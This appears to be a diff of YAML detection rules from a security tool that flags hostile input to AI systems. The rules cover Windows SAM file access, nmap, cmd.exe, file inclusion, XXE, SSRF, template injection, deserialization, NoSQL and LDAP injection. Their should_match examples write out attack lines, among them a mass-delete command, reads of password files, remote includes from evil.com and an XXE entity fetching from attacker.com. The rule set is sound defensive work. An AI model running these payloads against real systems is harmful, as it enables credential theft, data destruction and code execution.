- type C:\Windows\System32\config\SAM
|
|
25
|
+
- copy C:\Windows\System32\config\SYSTEM
|
|
26
|
+
- dir %SystemRoot%\System32\config\
|
|
27
|
+
should_not_match:
|
|
28
|
+
- Windows system files
|
|
29
|
+
- SAM database documentation
|
|
30
|
+
- Windows registry files
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
metadata:
|
|
37
|
+
created: '2025-11-09'
|
|
38
|
+
updated: '2025-11-09'
|
|
39
|
+
author: raxe-ce
|
|
40
|
+
legacy_rx_id: RX-CMD-1104
|
|
41
|
+
rule_hash: sha256:33e694474e3df17d36fdb37061eeef79b126c2559234aece8546f56daecb5ca0
|
|
42
|
+
risk_explanation: File access attacks target sensitive system files (passwords, SAM database, shadow files, cloud metadata) to extract credentials or configuration data. Successful access enables privilege escalation, account compromise, or cloud resource hijacking.
|
|
43
|
+
remediation_advice: Implement strict file access controls and permissions. Use least-privilege principles for file system access. Deploy file integrity monitoring for sensitive files. Restrict AI access to file systems. Monitor for unauthorized file access attempts.
|
|
44
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-1104-Windows-Sam-File
|
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-1105
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: network_tools
|
|
5
|
+
name: Detects nmap for network scanning
|
|
6
|
+
description: Detects nmap for network scanning
|
|
7
|
+
severity: high
|
|
8
|
+
confidence: 0.95
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: \bnmap\s+(-[^\s]+\s+)*\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
|
|
11
|
+
flags: []
|
|
12
|
+
timeout: 5.0
|
|
13
|
+
- pattern: \bnmap\s+(-[^\s]+\s+)*-p\s*\d+
|
|
14
|
+
flags: []
|
|
15
|
+
timeout: 5.0
|
|
16
|
+
- pattern: \bnmap\s+(-[^\s]+\s+)*-sV
|
|
17
|
+
flags: []
|
|
18
|
+
timeout: 5.0
|
|
19
|
+
examples:
|
|
20
|
+
should_match:
|
|
21
|
+
- nmap -sS 192.168.1.1
|
|
22
|
+
- nmap -p 22,80,443 10.0.0.1
|
|
23
|
+
- nmap -sV target.com
|
|
24
|
+
should_not_match:
|
|
25
|
+
- nmap network scanning tutorial
|
|
26
|
+
- Port scanning basics
|
|
27
|
+
- Network reconnaissance guide
|
|
28
|
+
metrics:
|
|
29
|
+
precision: null
|
|
30
|
+
recall: null
|
|
31
|
+
f1_score: null
|
|
32
|
+
last_evaluated: null
|
|
33
|
+
metadata:
|
|
34
|
+
created: '2025-11-09'
|
|
35
|
+
updated: '2025-11-09'
|
|
36
|
+
author: raxe-ce
|
|
37
|
+
legacy_rx_id: RX-CMD-1105
|
|
38
|
+
rule_hash: sha256:74be22629afd8399a0b6f9b9739b2a9e7f93361cba9999166f22f88dedacfe4e
|
|
39
|
+
risk_explanation: Network tool abuse (curl, wget, nmap, netcat) enables data exfiltration, network reconnaissance, port scanning, or establishing backdoor connections. These tools can be weaponized to map infrastructure, steal data, or facilitate lateral movement.
|
|
40
|
+
remediation_advice: Restrict network access from AI systems to only required services. Implement egress filtering and network segmentation. Use allowlisting for permitted network destinations. Monitor for suspicious network tool usage and data exfiltration patterns.
|
|
41
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-1105-Nmap-Network
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-1112
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: shell_invocation
|
|
5
|
+
name: Detects cmd.exe execution
|
|
6
|
+
description: Detects cmd.exe execution
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.98
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)cmd\.exe\s+/c\s+
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)cmd\s+/c\s+
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)%COMSPEC%\s+/c\s+
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
- cmd.exe /c whoami
|
|
25
|
+
- cmd /c del C:\*.*
|
|
26
|
+
- '%COMSPEC% /c dir'
|
|
27
|
+
should_not_match:
|
|
28
|
+
- Windows command prompt guide
|
|
29
|
+
- cmd.exe documentation
|
|
30
|
+
- Command line in Windows
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
metadata:
|
|
37
|
+
created: '2025-11-09'
|
|
38
|
+
updated: '2025-11-09'
|
|
39
|
+
author: raxe-ce
|
|
40
|
+
legacy_rx_id: RX-CMD-1112
|
|
41
|
+
rule_hash: sha256:9854e5d01a8b866d1253d2fc56cabc6f1f35c08f1ea7670f45b199fd8368dda3
|
|
42
|
+
risk_explanation: Direct shell invocation (cmd.exe, /bin/sh, PowerShell) provides attackers with full command execution capabilities. This is one of the highest-risk vulnerabilities as it grants complete control over command execution.
|
|
43
|
+
remediation_advice: Never invoke shells with user-controlled input. Use APIs or libraries that don't require shell execution. Implement application-level command execution with strict validation. Deploy shell invocation detection and blocking.
|
|
44
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-1112-Cmd.Exe-Execution
|
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-201
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: file_inclusion
|
|
5
|
+
name: Local File Inclusion (LFI) Attack Detection
|
|
6
|
+
description: Detects Local File Inclusion attempts using path traversal
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.96
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:\.\.\/|\.\.\\){2,}
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)(?:file|include|require|load).*(?:\/etc\/passwd|\/etc\/shadow|\/windows\/system32)
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)(?:\.\.\/){3,}.*(?:etc|var|usr|windows)
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
- "include ../../../etc/passwd"
|
|
25
|
+
- "file=../../../../windows/system32/config/sam"
|
|
26
|
+
- "load ../../../../../../etc/shadow"
|
|
27
|
+
should_not_match:
|
|
28
|
+
- "What is path traversal?"
|
|
29
|
+
- "How to prevent LFI attacks?"
|
|
30
|
+
- "Relative paths in applications"
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
mitre_attack:
|
|
37
|
+
- T1083
|
|
38
|
+
- T1005
|
|
39
|
+
metadata:
|
|
40
|
+
created: '2025-11-16'
|
|
41
|
+
updated: '2025-11-16'
|
|
42
|
+
author: raxe-ce
|
|
43
|
+
category: web_attacks
|
|
44
|
+
rule_hash: null
|
|
45
|
+
risk_explanation: File inclusion attacks (LFI/RFI) exploit file loading functionality to include malicious files from local or remote sources. This can lead to code execution, information disclosure, or complete application compromise.
|
|
46
|
+
remediation_advice: Use strict allowlisting for file inclusion. Never construct file paths from user input. Implement path validation and sanitization. Disable remote file inclusion in language configurations. Deploy file inclusion attack detection.
|
|
47
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-201-Local-File-Inclusion-(Lfi)
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-202
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: file_inclusion
|
|
5
|
+
name: Remote File Inclusion (RFI) Attack Detection
|
|
6
|
+
description: Detects Remote File Inclusion attempts using external URLs
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.95
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:include|require|load|import).*(?:https?|ftp|ftps):\/\/(?:(?!example\.com|localhost).)*
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)(?:file|url|path)=(?:https?|ftp):\/\/[^\s&]+\.(?:php|asp|jsp|txt)
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
examples:
|
|
19
|
+
should_match:
|
|
20
|
+
- "include http://evil.com/shell.php"
|
|
21
|
+
- "require https://attacker.net/backdoor.txt"
|
|
22
|
+
- "file=http://malicious.com/payload.php"
|
|
23
|
+
should_not_match:
|
|
24
|
+
- "What is RFI?"
|
|
25
|
+
- "How to prevent remote file inclusion?"
|
|
26
|
+
- "include https://example.com/library"
|
|
27
|
+
metrics:
|
|
28
|
+
precision: null
|
|
29
|
+
recall: null
|
|
30
|
+
f1_score: null
|
|
31
|
+
last_evaluated: null
|
|
32
|
+
mitre_attack:
|
|
33
|
+
- T1105
|
|
34
|
+
metadata:
|
|
35
|
+
created: '2025-11-16'
|
|
36
|
+
updated: '2025-11-16'
|
|
37
|
+
author: raxe-ce
|
|
38
|
+
category: web_attacks
|
|
39
|
+
rule_hash: null
|
|
40
|
+
risk_explanation: File inclusion attacks (LFI/RFI) exploit file loading functionality to include malicious files from local or remote sources. This can lead to code execution, information disclosure, or complete application compromise.
|
|
41
|
+
remediation_advice: Use strict allowlisting for file inclusion. Never construct file paths from user input. Implement path validation and sanitization. Disable remote file inclusion in language configurations. Deploy file inclusion attack detection.
|
|
42
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-202-Remote-File-Inclusion-(Rfi)
|
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-203
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: xxe_injection
|
|
5
|
+
name: XML External Entity (XXE) Injection Detection
|
|
6
|
+
description: Detects XXE injection attempts in XML payloads
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.97
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: '(?i)<!ENTITY\s+\w+\s+SYSTEM\s+["''](?:file|http|ftp|gopher|php|expect|data):'
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)<!DOCTYPE.*\[.*<!ENTITY.*SYSTEM
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
- DOTALL
|
|
18
|
+
timeout: 5.0
|
|
19
|
+
examples:
|
|
20
|
+
should_match:
|
|
21
|
+
- "<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
|
|
22
|
+
- "<!ENTITY xxe SYSTEM 'http://attacker.com/evil.dtd'>"
|
|
23
|
+
- "<!ENTITY xxe SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>"
|
|
24
|
+
should_not_match:
|
|
25
|
+
- "What is XXE vulnerability?"
|
|
26
|
+
- "How to prevent XXE attacks?"
|
|
27
|
+
- "XML parsing best practices"
|
|
28
|
+
metrics:
|
|
29
|
+
precision: null
|
|
30
|
+
recall: null
|
|
31
|
+
f1_score: null
|
|
32
|
+
last_evaluated: null
|
|
33
|
+
mitre_attack:
|
|
34
|
+
- T1059
|
|
35
|
+
metadata:
|
|
36
|
+
created: '2025-11-16'
|
|
37
|
+
updated: '2025-11-16'
|
|
38
|
+
author: raxe-ce
|
|
39
|
+
category: web_attacks
|
|
40
|
+
rule_hash: null
|
|
41
|
+
risk_explanation: XML External Entity (XXE) attacks exploit XML parsing to read files, perform SSRF attacks, or cause denial of service. XXE can expose sensitive data, enable internal network scanning, or consume excessive system resources.
|
|
42
|
+
remediation_advice: Disable external entity processing in XML parsers. Use safe XML parsing configurations. Implement input validation for XML content. Deploy XXE-specific detection and blocking. Consider using safer data formats like JSON.
|
|
43
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-203-Xml-External-Entity-(Xxe)
|
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-204
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: ssrf
|
|
5
|
+
name: Server-Side Request Forgery (SSRF) Detection
|
|
6
|
+
description: Detects SSRF attempts targeting internal/cloud metadata services
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.94
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:url|link|fetch|curl|wget).*(?:169\.254\.169\.254|metadata\.google\.internal|169\.254\.170\.2)
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)(?:url|link|fetch).*(?:localhost|127\.0\.0\.1|0\.0\.0\.0|::1).*(?:admin|internal|private)
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)(?:file|dict|gopher|ftp|ldap|tftp):\/\/.*(?:localhost|127\.0\.0\.1|192\.168\.|10\.|172\.1[6-9]\.|172\.2[0-9]\.|172\.3[01]\.)
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
- "fetch http://169.254.169.254/latest/meta-data/"
|
|
25
|
+
- "curl http://metadata.google.internal/computeMetadata/v1/"
|
|
26
|
+
- "url=gopher://127.0.0.1:6379/_"
|
|
27
|
+
should_not_match:
|
|
28
|
+
- "What is SSRF?"
|
|
29
|
+
- "How to prevent SSRF attacks?"
|
|
30
|
+
- "Cloud metadata security"
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
mitre_attack:
|
|
37
|
+
- T1071
|
|
38
|
+
- T1590
|
|
39
|
+
metadata:
|
|
40
|
+
created: '2025-11-16'
|
|
41
|
+
updated: '2025-11-16'
|
|
42
|
+
author: raxe-ce
|
|
43
|
+
category: web_attacks
|
|
44
|
+
rule_hash: null
|
|
45
|
+
risk_explanation: Server-Side Request Forgery (SSRF) tricks servers into making requests to unintended destinations, often internal systems. This can expose internal services, read cloud metadata, or bypass network security controls.
|
|
46
|
+
remediation_advice: Implement strict allowlisting for external requests. Validate and sanitize all URLs. Use network segmentation to isolate internal services. Deploy SSRF detection. Never make requests to user-supplied URLs without validation.
|
|
47
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-204-Server-Side-Request-Forgery-(Ssrf)
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-205
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: template_injection
|
|
5
|
+
name: Server-Side Template Injection (SSTI) Detection
|
|
6
|
+
description: Detects SSTI attempts in various template engines
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.93
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: \{\{.*(?:config|self|request|lipsum|cycler|joiner|namespace).*\}\}
|
|
11
|
+
flags: []
|
|
12
|
+
timeout: 5.0
|
|
13
|
+
- pattern: \$\{.*(?:7\*7|Runtime|Class\.forName|eval|exec).*\}
|
|
14
|
+
flags: []
|
|
15
|
+
timeout: 5.0
|
|
16
|
+
- pattern: <%=.*(?:system|exec|eval|File|Runtime).*%>
|
|
17
|
+
flags: []
|
|
18
|
+
timeout: 5.0
|
|
19
|
+
examples:
|
|
20
|
+
should_match:
|
|
21
|
+
- "{{config.items()}}"
|
|
22
|
+
- "${7*7}"
|
|
23
|
+
- "{{request.application.__globals__}}"
|
|
24
|
+
- "<%=system('whoami')%>"
|
|
25
|
+
should_not_match:
|
|
26
|
+
- "What is SSTI?"
|
|
27
|
+
- "Template injection examples"
|
|
28
|
+
- "{{user.name}} in templates"
|
|
29
|
+
metrics:
|
|
30
|
+
precision: null
|
|
31
|
+
recall: null
|
|
32
|
+
f1_score: null
|
|
33
|
+
last_evaluated: null
|
|
34
|
+
mitre_attack:
|
|
35
|
+
- T1059
|
|
36
|
+
metadata:
|
|
37
|
+
created: '2025-11-16'
|
|
38
|
+
updated: '2025-11-16'
|
|
39
|
+
author: raxe-ce
|
|
40
|
+
category: web_attacks
|
|
41
|
+
rule_hash: null
|
|
42
|
+
risk_explanation: Server-Side Template Injection (SSTI) exploits template engines to execute arbitrary code. Attackers inject malicious template syntax to gain code execution, access sensitive data, or compromise the application server.
|
|
43
|
+
remediation_advice: Never use user input directly in templates without sanitization. Use template sandboxing when available. Implement strict input validation. Consider using logic-less template engines. Deploy template injection detection.
|
|
44
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-205-Server-Side-Template-Injection-(Ssti)
|
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-206
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: deserialization
|
|
5
|
+
name: Insecure Deserialization Attack Detection
|
|
6
|
+
description: Detects malicious serialized payloads and deserialization attempts
|
|
7
|
+
severity: critical
|
|
8
|
+
confidence: 0.92
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:rO0|aced0005|yv66vg).*(?:Runtime|ProcessBuilder|exec|eval)
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)__reduce__|__setstate__|pickle|marshal|yaml\.load|unserialize
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)O:\d+:"(?:stdClass|PDO|SimpleXMLElement)"
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
- "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ=="
|
|
25
|
+
- "__reduce__ = lambda self: (os.system, ('whoami',))"
|
|
26
|
+
- "O:8:\"stdClass\":1:{s:4:\"exec\";s:6:\"whoami\";}"
|
|
27
|
+
should_not_match:
|
|
28
|
+
- "What is deserialization?"
|
|
29
|
+
- "Safe serialization practices"
|
|
30
|
+
- "Pickle security documentation"
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
mitre_attack:
|
|
37
|
+
- T1027
|
|
38
|
+
- T1059
|
|
39
|
+
metadata:
|
|
40
|
+
created: '2025-11-16'
|
|
41
|
+
updated: '2025-11-16'
|
|
42
|
+
author: raxe-ce
|
|
43
|
+
category: web_attacks
|
|
44
|
+
rule_hash: null
|
|
45
|
+
risk_explanation: Insecure deserialization attacks exploit object deserialization to execute arbitrary code, manipulate application logic, or cause denial of service. Deserializing untrusted data is extremely dangerous.
|
|
46
|
+
remediation_advice: Never deserialize untrusted data. Use safe serialization formats (JSON) instead of language-specific formats (pickle, serialized PHP). Implement type checking and validation. Use allowlisting for permitted classes. Deploy deserialization attack detection.
|
|
47
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-206-Insecure-Deserialization-Attack-Detection
|
|
@@ -0,0 +1,46 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-207
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: nosql_injection
|
|
5
|
+
name: NoSQL Injection Detection
|
|
6
|
+
description: Detects NoSQL injection attempts (MongoDB, etc.)
|
|
7
|
+
severity: high
|
|
8
|
+
confidence: 0.91
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)\$(?:ne|eq|gt|gte|lt|lte|in|nin|and|or|not|nor|exists|where|regex)
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)\{\s*['"]\$ne['"]:\s*null\s*\}
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
- pattern: (?i)(?:username|password|user|email)\[(?:\$ne|\$regex|\$gt)\]
|
|
19
|
+
flags:
|
|
20
|
+
- IGNORECASE
|
|
21
|
+
timeout: 5.0
|
|
22
|
+
examples:
|
|
23
|
+
should_match:
|
|
24
|
+
- "username[$ne]=admin&password[$ne]=null"
|
|
25
|
+
- '{"$where": "this.password == ''password''"}'
|
|
26
|
+
- "user[$regex]=.*"
|
|
27
|
+
should_not_match:
|
|
28
|
+
- "What is NoSQL injection?"
|
|
29
|
+
- "MongoDB query operators documentation"
|
|
30
|
+
- "Database security best practices"
|
|
31
|
+
metrics:
|
|
32
|
+
precision: null
|
|
33
|
+
recall: null
|
|
34
|
+
f1_score: null
|
|
35
|
+
last_evaluated: null
|
|
36
|
+
mitre_attack:
|
|
37
|
+
- T1059
|
|
38
|
+
metadata:
|
|
39
|
+
created: '2025-11-16'
|
|
40
|
+
updated: '2025-11-16'
|
|
41
|
+
author: raxe-ce
|
|
42
|
+
category: web_attacks
|
|
43
|
+
rule_hash: null
|
|
44
|
+
risk_explanation: NoSQL injection attacks manipulate queries to NoSQL databases (MongoDB, etc.) to bypass authentication, extract data, or modify records. These attacks exploit different syntax than SQL but can be equally devastating.
|
|
45
|
+
remediation_advice: Use parameterized queries and prepared statements for NoSQL databases. Implement input validation and type checking. Use database security features like role-based access control. Never concatenate user input into queries.
|
|
46
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-207-Nosql-Injection-Detection
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
version: 1.0.0
|
|
2
|
+
rule_id: cmd-208
|
|
3
|
+
family: CMD
|
|
4
|
+
sub_family: ldap_injection
|
|
5
|
+
name: LDAP Injection Attack Detection
|
|
6
|
+
description: Detects LDAP injection attempts using special characters
|
|
7
|
+
severity: high
|
|
8
|
+
confidence: 0.90
|
|
9
|
+
patterns:
|
|
10
|
+
- pattern: (?i)(?:\*|\(|\)|\||&).*(?:objectClass|cn=|ou=|dc=|uid=)
|
|
11
|
+
flags:
|
|
12
|
+
- IGNORECASE
|
|
13
|
+
timeout: 5.0
|
|
14
|
+
- pattern: (?i)(?:cn|uid|ou|dc)=.*[\*\(\)\|&]
|
|
15
|
+
flags:
|
|
16
|
+
- IGNORECASE
|
|
17
|
+
timeout: 5.0
|
|
18
|
+
examples:
|
|
19
|
+
should_match:
|
|
20
|
+
- "cn=*)(uid=*))(|(cn=*"
|
|
21
|
+
- "user=admin)(|(password=*))"
|
|
22
|
+
- "uid=*)(objectClass=*"
|
|
23
|
+
should_not_match:
|
|
24
|
+
- "What is LDAP injection?"
|
|
25
|
+
- "LDAP query syntax"
|
|
26
|
+
- "Active Directory security"
|
|
27
|
+
metrics:
|
|
28
|
+
precision: null
|
|
29
|
+
recall: null
|
|
30
|
+
f1_score: null
|
|
31
|
+
last_evaluated: null
|
|
32
|
+
mitre_attack:
|
|
33
|
+
- T1087
|
|
34
|
+
metadata:
|
|
35
|
+
created: '2025-11-16'
|
|
36
|
+
updated: '2025-11-16'
|
|
37
|
+
author: raxe-ce
|
|
38
|
+
category: web_attacks
|
|
39
|
+
rule_hash: null
|
|
40
|
+
risk_explanation: LDAP injection manipulates directory service queries to bypass authentication, extract user information, or escalate privileges. This can compromise directory services that control authentication and authorization.
|
|
41
|
+
remediation_advice: Use parameterized LDAP queries or safe query builders. Implement strict input validation and escaping. Use least-privilege LDAP service accounts. Deploy LDAP injection detection and blocking.
|
|
42
|
+
docs_url: https://github.com/raxe-ai/raxe-ce/wiki/CMD-208-Ldap-Injection-Attack-Detection
|